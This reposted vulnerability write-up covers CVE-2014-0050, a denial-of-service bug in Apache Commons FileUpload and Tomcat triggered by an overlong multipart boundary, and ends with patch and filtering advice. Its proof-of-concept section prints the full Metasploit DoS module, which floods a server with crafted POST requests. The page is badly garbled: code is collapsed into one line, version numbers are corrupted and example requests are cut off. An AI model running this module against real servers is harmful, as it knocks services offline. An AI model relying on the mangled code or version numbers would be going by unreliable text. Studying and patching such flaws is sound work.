Cve-2014-0050:exploit with boundaries, Loops without boundaries, Apache Commons FileUpload and Apache Tomcat DoS

Source: Internet
Author: User
Tags jboss apache tomcat cve

Catalog

1 . Description2. Analysis3. POC4. Solution

1. Description

Multipartstream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, a Llows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-type header That bypasses a loop ' s intended exit conditions
The Apache Commons FileUpload 1.3.1 and Multipartstream.java files in the previous version of Apache Tomcat and JBoss Web have security vulnerabilities. A remote attacker could exploit the vulnerability with a specially crafted Content-type header to cause a denial of service (infinite loop and CPU consumption)

Relevant Link:

http://cve.scap.org.cn/cve-2014-0050.htmlhttps://www.rapid7.com/db/ vulnerabilities/apache-tomcat-cve-2014-0050http://www.cnblogs.com/geekcui/p/3599425.html 

2. Analysis

A typical multipart/form-data file upload package format as follows

Post/upload_file/uploadfile http/1.1  accept:text/plain, * /*

As you can see, the boundary is segmented in the Multipart/form-data stream, and the specific contents of boundary are given in the HTTP header

0x1: Vulnerability Code Analysis

/commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/multipartstream.java

The fixed code has a extra "if" condition (line number), that validates, the length of the multipart boundary to be sho Rter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

1 4096 1 4 4091 // parts of the code were copied into the Org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2:creating the Exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3:why is this happening

While parsing the multipart message, the following ' for ' loop is used by the Multipartstream class:

The innocent-looking "for" loop above are an endless loop. It is ' family related ' to the famous ' while (true) ' Loop. The developer ' s intention is to exit this loop either by raising an exception (line 1003) or by returning a value (line 1 014), unfortunately when the boundary was longer than 4091 characters (as explained earlier) and the body is longer than 40 Characters (so it can potentially contain the boundary), neither would ever occur

relevant Link:

HTTPS://www.trustwave.com/resources/spiderlabs-blog/cve-2014-0050--exploit-with-boundaries,- Loops-without-boundaries/

3. POC

0x1:metasploit

MSF > Use auxiliary/dos/http/> show Actions    set ACTION <action-name>  > Show Options    set> Run

0x2:apache_commons_fileupload_dos.rb

# # # This module requires metasploit:http://Metasploit.com/download# Current Source:https://github.com/rapid7/metasploit-framework# #require'Msf/core'classMETASPLOIT4 <msf::auxiliary include msf::exploit::remote::httpclient include msf::auxiliary::D os def initialize (info={}) Super (Update_info (info,'Name'='Apache Commons FileUpload and Apache Tomcat DoS',      'Description'=%q{This module triggers an infinite loopinchApache Commons FileUpload1.0through1.3via a specially crafted content-Type header. Apache Tomcat7and Apache Tomcat8Use a copy of FileUpload to handle MIME-multipart requests, therefore, Apache Tomcat7.0.0Through7.0. - and8.0.0-rc1 through8.0.1Is affected by ThisIssue. Tomcat6also uses Commons FileUpload asPart of the Manager application. },       'Author'=         [           'Unknown', # This issue is reported to the Apache software Foundation and accidentally made Public. 'Ribeirux'# Metasploit Module],'License'=Msf_license,'References'=         [           ['CVE','2014-0050'],           ['URL','http://tomcat.apache.org/security-8.html'],           ['URL','http://tomcat.apache.org/security-7.html']         ],        'disclosuredate'='6 of the Feb')) Register_options ([Opt::rport (8080), optstring.New('TARGETURI', [true,"The request URI",'/']), Optint.New('Rlimit', [true,"Number of requests to send", -]), self.class) End def run boundary="0"*4092opts= {      'Method'="POST",      'URI'=Normalize_uri (target_uri.to_s),'CType'="multipart/form-data; boundary=#{boundary}",      'Data'="#{boundary}00000",      'Headers'= {        'Accept'='*/*'}} # Xxx:there isRarely,ifEver, a need forA' for'LoopinchRuby # This should is rewritten with1. upto () or Enumerable#each or # something forXinch 1.. datastore['Rlimit'] Print_status ("sending request #{x} to #{peer}") begin C=Connect R=c.request_cgi (opts) c.send_request (r) # Don't wait for a responseRescue:: Rex::connectionerror =Exception Print_error ("#{peer}-Unable to connect: ' #{exception.message} '")        returnensure disconnect (c)ifC End End EndEnd

Relevant Link:

HTTPS://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_doshttps: // Raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_ FILEUPLOAD_DOS.RB

4. Solution

0x1:defend yourself

1. Once available, update your software to one of the following Versions:apache Commons FileUpload1.3.1Apache Tomcat7.0.WuyiApache Tomcat8.0.22. Choose to apply the appropriate Patch:apache Commons fileupload:http://svn.apache.org/r1565143Apache Tomcat8: http://svn.apache.org/r1565163Apache Tomcat7: http://svn.apache.org/r1565169

0x2:modsecurity Commercial Rule Set

" @rx. {4000} "

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) Little5ann All rights reserved

Cve-2014-0050:exploit with boundaries, Loops without boundaries, Apache Commons FileUpload and Apache Tomcat DoS

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.